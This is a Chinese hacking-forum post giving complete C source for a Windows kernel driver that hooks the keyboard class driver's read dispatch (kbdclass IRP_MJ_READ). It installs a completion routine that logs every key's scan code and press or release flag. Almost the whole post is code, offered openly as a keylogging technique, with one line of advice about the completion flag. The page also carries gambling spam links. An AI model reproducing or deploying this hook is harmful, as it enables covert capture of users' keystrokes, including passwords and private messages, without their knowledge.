刺激战场
六合彩
贵宾厅
  • 1306阅读
  • 1回复

通过IRPhook实现键盘记录 [复制链接]

上一主题 下一主题
离线啊冲
 

只看楼主 倒序阅读 使用道具 楼主  发表于: 2016-02-04



测试机器:win7x86
myhead.h:


[cpp] view plain copy
  1. #include <ntddk.h>  
  2.   
  3.   
  4. NTKERNELAPI NTSTATUS ObReferenceObjectByName  
  5. (  
  6. IN PUNICODE_STRING ObjectName,  
  7. IN ULONG Attributes,  
  8. IN PACCESS_STATE PassedAccessState OPTIONAL,  
  9. IN ACCESS_MASK DesiredAccess OPTIONAL,  
  10. IN POBJECT_TYPE ObjectType,  
  11. IN KPROCESSOR_MODE AccessMode,  
  12. IN OUT PVOID ParseContext OPTIONAL,  
  13. OUT PVOID *Object  
  14. );  
  15.   
  16.   
  17. typedef NTSTATUS(__stdcall *PDRVDISPATCHFUNC)(PDEVICE_OBJECT pDevObj, PIRP pIrp);  
  18.   
  19.   
  20.   
  21. NTSTATUS DisPatchRead(PDEVICE_OBJECT pDevObj, PIRP pIrp);  
  22. NTSTATUS Hook(BOOLEAN IsEnble);  
  23. void Unload(PDRIVER_OBJECT pDriverObj);  
  24. NTSTATUS  
  25. MyCompletionRoutine(  
  26. __in PDEVICE_OBJECT  DeviceObject,  
  27. __in PIRP  Irp,  
  28. __in PVOID  Context  
  29. );  



test.c


[cpp] view plain copy
  1. #include "myhead.h"  
  2. #include <ntddkbd.h>  
  3.   
  4. extern POBJECT_TYPE *IoDriverObjectType;  
  5. PDRVDISPATCHFUNC OrlDispatchRead = NULL;  
  6. ULONG numPendingIrps = 0;  
  7.   
  8. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegisterStr)  
  9. {  
  10.     UNREFERENCED_PARAMETER(pRegisterStr);  
  11.     NTSTATUS status = STATUS_SUCCESS;  
  12.     pDriverObj->DriverUnload = Unload;  
  13.   
  14.     DbgPrint("DriverEntry\n");  
  15.     Hook(TRUE);  
  16.     return status;  
  17. }  
  18.   
  19. void Unload(PDRIVER_OBJECT pDriverObj)  
  20. {  
  21.     LARGE_INTEGER liDelayTime;  
  22.     Hook(FALSE);  
  23.     liDelayTime.QuadPart = -1000000;  
  24.     while (numPendingIrps > 0)  
  25.     {  
  26.         KeDelayExecutionThread(KernelMode, FALSE, &liDelayTime);  
  27.     }  
  28.     DbgPrint("Unload\n");  
  29. }  
  30.   
  31. NTSTATUS Hook(BOOLEAN IsEnble)  
  32. {  
  33.     NTSTATUS status = STATUS_UNSUCCESSFUL;  
  34.     UNICODE_STRING usKeyDrvName;  
  35.     PDRIVER_OBJECT pKeyDrvObj = NULL;  
  36.     RtlInitUnicodeString(&usKeyDrvName, L"\\Driver\\kbdclass");  
  37.     status = ObReferenceObjectByName(&usKeyDrvName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID*)&pKeyDrvObj);  
  38.     if (!NT_SUCCESS(status))  
  39.     {  
  40.         DbgPrint("ObReferenceObjectByName error status:%p\n",status);  
  41.         return status;  
  42.     }  
  43.     ObReferenceObject(pKeyDrvObj);  
  44.     if (IsEnble)  
  45.     {  
  46.         OrlDispatchRead = pKeyDrvObj->MajorFunction[IRP_MJ_READ];  
  47.         pKeyDrvObj->MajorFunction[IRP_MJ_READ] = (PDRVDISPATCHFUNC)DisPatchRead;  
  48.     }  
  49.     else  
  50.     {  
  51.         pKeyDrvObj->MajorFunction[IRP_MJ_READ] = OrlDispatchRead;  
  52.     }  
  53.   
  54.     return status;  
  55.   
  56. }  
  57.   
  58. NTSTATUS DisPatchRead(PDEVICE_OBJECT pDevObj, PIRP pIrp)  
  59. {  
  60.   
  61.     PIO_STACK_LOCATION pIrpSp = IoGetCurrentIrpStackLocation(pIrp);  
  62.     DbgPrint("pIrpSp->Control:%x", pIrpSp->Control);  
  63.     DbgPrint("abc:%x", SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL);  
  64.     pIrpSp->Control = SL_INVOKE_ON_SUCCESS /*| SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL*/;  
  65.     if (NT_SUCCESS(pIrp->IoStatus.Status))  
  66.     {  
  67.         DbgPrint("DisPatchRead KEY BOARD\n");  
  68.   
  69.         DbgPrint("CompletionRoutine %p BOARD\n", (PVOID)pIrpSp->CompletionRoutine);  
  70.         pIrpSp->Context = (PVOID)pIrpSp->CompletionRoutine;  
  71.         pIrpSp->CompletionRoutine = MyCompletionRoutine;  
  72.     }  
  73.     if (pIrp->PendingReturned)  
  74.     {  
  75.         IoMarkIrpPending(pIrp);  
  76.     }  
  77.     numPendingIrps++;  
  78.     return OrlDispatchRead(pDevObj, pIrp);  
  79. }  
  80.   
  81. NTSTATUS  
  82. MyCompletionRoutine(  
  83. __in PDEVICE_OBJECT  DeviceObject,  
  84. __in PIRP  Irp,  
  85. __in PVOID  Context  
  86. )  
  87. {  
  88.     DbgPrint("MyCompletionRoutine\n");  
  89.     PKEYBOARD_INPUT_DATA pKid;  
  90.     //PIO_STACK_LOCATION pIrpSp = IoGetCurrentIrpStackLocation(Irp);  
  91.     if (NT_SUCCESS(Irp->IoStatus.Status))  
  92.     {  
  93.         pKid = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;  
  94.         ULONG uCount = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);  
  95.         for (ULONG i = 0; i < uCount;i++)  
  96.         {  
  97.             switch (pKid->Flags)  
  98.             {  
  99.             case KEY_MAKE:  
  100.                 DbgPrint("\nFlag: KEY_MAKE\n");  
  101.                 break;  
  102.             case KEY_BREAK:  
  103.                 DbgPrint("\nFlag: KEY_BREAK\n");  
  104.                 break;  
  105.             }  
  106.             DbgPrint("Key Code: %x\n", pKid->MakeCode);  
  107.         }  
  108.     }  
  109.     if (Irp->PendingReturned)  
  110.     {  
  111.         IoMarkIrpPending(Irp);  
  112.     }  
  113.     numPendingIrps--;  
  114.     if ((Irp->StackCount > (ULONG)1) && (Context != NULL))  
  115.     {  
  116.         return ((PIO_COMPLETION_ROUTINE)Context)(DeviceObject, Irp, NULL);  
  117.     }  
  118.     else  
  119.         return Irp->IoStatus.Status;  
  120. }  


其中

[cpp] view plain copy
  1. pIrpSp->Control = SL_INVOKE_ON_SUCCESS /*| SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL*/;  


[cpp] view plain copy
  1. 这一句是必须要设置的,不然进不了自己的完成函数!  
善者 慈悲心常在 无怨无恨 以苦为乐
默认压缩密码www.hifyl.com
文件分享密码问题:http://www.hifyl.com/read-htm-tid-4444.html
离线v2680267313

只看该作者 沙发  发表于: 2016-04-30
用户被禁言,该主题自动屏蔽!
快速回复
限100 字节
批量上传需要先选择文件,再选择上传
 
上一个 下一个